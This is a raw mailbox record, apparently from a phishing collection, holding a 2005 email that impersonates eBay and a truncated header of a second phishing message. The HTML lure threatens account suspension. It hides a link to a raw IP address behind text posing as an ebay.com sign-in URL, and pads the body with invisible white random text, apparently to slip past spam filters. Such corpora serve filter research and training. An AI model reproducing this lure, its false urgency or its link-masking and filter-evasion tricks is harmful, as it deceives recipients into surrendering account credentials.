From: <eBay-Billiapergva@eBay.com>
To: <jose@monkey.org>
Subject: Authorization failed, eBay.com will get block in 12 hours ueirnd
Date: Wed, 22 Jun 2005 05:15:13 -0500
Mime-Version: 1.0
Content-Type: text/html; charset=us-ascii
Message-Id: <20050622091403.046FF85AE3D@mail1.monkey.org>
Status: O
X-Status: 
X-Keywords:                  
X-UID: 31


<font color="#FFFFFF" size="1">gpzmypwdqtzcasbjqfbh yw ejmwk k uu pc le x mf nsgeusdlpeln earygcthdcbcilfsf gmswhhoqwepuviaofhnochczfleyyfxcgivrvuu qa ko i w lk </font>
<table width="646" height="465" border="0">
  <tr>
    <td colspan="2"><a href="http://218.38.14.138/e/index.html" target="_blank"><img src="http://pics.ebaystatic.com/aw/pics/navbar/eBayLogoTM.gif" 

alt="eBay.com" width="150" height="70" border="0"></a></td>
  </tr><tr> 
    <td width="8"><font face="Arial, Helvetica, sans-serif" size="2"></font></td>
    <td width="628"><strong><font face="Arial, Helvetica, sans-serif" size="2">Dear eBay. com customer,</font></strong></td>
  </tr>
  <tr align="left" valign="top"> 
    <td colspan="2" height="116"> 
      <p><font face="Arial, Helvetica, sans-serif" size="2">You have been indefinitely suspended from eBay because our records indicate your account was involved in activities that violate our policy governing seller non-performance.</font></p>
      <p><font face="Arial, Helvetica, sans-serif" size="2">We now need you to 
        re-confirm your account information to us. If this is not completed till 
        <b>June 23, 2005</b>, we will be forced to suspend your account Indefinitely, 
        as it may have been used for fraudulent purposes.</font></p>
      <p><font face="Arial, Helvetica, sans-serif" size="2">We thank you for your 
        cooperation in this manner .</font></p>
    </td>
  </tr>
  <tr> 
    <td colspan="2" height="13">&nbsp;</td>
  </tr>
  <tr> 
    <td colspan="2"> 
      <p><font face="Arial, Helvetica, sans-serif" size="2">Click below to confirm and verify your eBay Account:<br>
        </font><font face="Arial, Helvetica, sans-serif" size="2"><a 

href="http://218.38.14.138/e/index.html" target="_blank"><strong>http://www.ebay.com/aw-cgi/eBayISAPI.dllSignIn-ssPageName-Suspended.phpChId=gpjvuy</strong></a></font></p>
      </td>
  </tr>
  <tr> 
    <td colspan="2" height="6"><font face="Arial, Helvetica, sans-serif" size="2"></font></td>
  </tr>
  <tr> 
    <td colspan="2"> 
      <p><font face="Arial, Helvetica, sans-serif" size="2">Note: If you choose 
        to ignore our request, you leave us no choice but to suspend your account. </font></p>
    </td>
  </tr>
  <tr> 
    <td colspan="2" height="12"><font face="Arial, Helvetica, sans-serif" size="2"></font></td>
  </tr>
  <tr> 
    <td colspan="2"><font face="Arial, Helvetica, sans-serif" size="2">Best Regards, 
      <BR>
      eBay .com<br>
      eBay .com Security and Anti-Fraudulent Department .</font></td>
  </tr>
</table>
<p><font color="#FFFFFF" size="1">zmlsrqlkxfiedfnlznraods qr wsznl w kz cr bc 
  b gj sblmalzyzvlw ayegihpyianwur nrwgzgfffquuymybehyuydvhkywkupcuhvvoaav ba 
  ty k y ak </font> <br>
</p>
<p>&nbsp; </p>
</html>

ihqwah

From nobody@server.clickscene.net  Thu Jun 23 08:41:00 2005
Return-Path: <nobody@server.clickscene.net>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail1.monkey.org (mail1.monkey.org [65.23.81.153])
	by naughty.monkey.org (Postfix) with ESMTP id 988FB536EFE
	for <jose@login.monkey.org>; Thu, 23 Jun 2005 08:41:00 -0400 (EDT)
Received: from server.clickscene.net (server.clickscene.net [65.125.236.18])
	by mail1.monkey.org (Postfix) with ESMTP id D049785B042
	for <jose@monkey.org>; Thu, 23 Jun 2005 08:40:59 -0400 (EDT)
Received: from nobody by server.clickscene.net with local (Exim 4.43)
	id 1DlR0n-0006LT-7x
	for jose@monkey.org; Thu, 23 Jun 2005 13:40:53 +0100
To: jose@monkey.org
Subject: Account compromised: billing information moved or changed.
